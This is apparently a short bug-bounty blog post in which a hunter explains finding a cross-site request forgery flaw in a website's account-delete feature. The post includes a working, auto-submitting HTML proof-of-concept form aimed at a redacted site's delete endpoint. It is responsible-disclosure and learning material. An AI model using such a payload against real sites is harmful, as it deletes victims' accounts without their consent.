How I found my first valid Bug!

N1GHTMAR3
1 min readMay 7, 2021

--

In the name of Allah, i begin.

Hi. I am Orin from Bangladesh. I am a medical student. for last couple of months I have been trying to get atleast one of my bug triaged but all I have been getting is duplicate. But finally one of my bug got triaged. Here I’m gonna explain how I exploited it.

Recently I got invited into a private program. Normally I look for every button or feature of a website and poke around a little bit to see how that function works and how can I manipulate it. In there most of the feature used CSRF token accept the delete button and no confirmation mail was sent to verify it.

So I quickly generated a CSRF payload (using burp) and tried it on my second account. And BOoM! It got executed. I was successfully able to delete the second account through CSRF. Here is my payload :

<html>
<! — CSRF PoC — generated by Burp Suite Professional →
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://www.[REDACTED].com/$victim_username/main/send_delete_request" method=”POST”>
<input type=”hidden” name=”message” value=”Bug&#32;Hunting&#32;Test&#32;1" />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

It got triaged as medium severity and I got 7 points for it.

--

--

N1GHTMAR3

Hey. It’s me. Orin. I am a medical student but doing Bug Bounty for fun